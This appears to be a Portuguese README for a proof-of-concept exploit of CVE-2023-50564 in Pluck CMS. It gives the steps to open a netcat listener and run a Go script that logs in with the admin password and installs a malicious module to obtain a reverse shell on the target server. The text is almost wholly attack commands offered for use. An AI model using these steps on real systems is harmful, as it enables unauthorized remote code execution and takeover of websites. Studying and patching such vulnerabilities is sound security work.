
Prova de conceito de exploit para CVE-2023-50564 direcionado ao Pluck CMS, entregando um reverse shell por meio da instalação de módulo malicioso.
Primeiro, configure um listener para o reverse shell.
Terminal 1
nc -nlvp <lport>
Execute o script que tentará instalar um módulo pluck enviando o reverse shell de volta para nós.
Terminal 2
go run exploit.go -url <url> -password <passwd> -i <your-ip> -p <lport>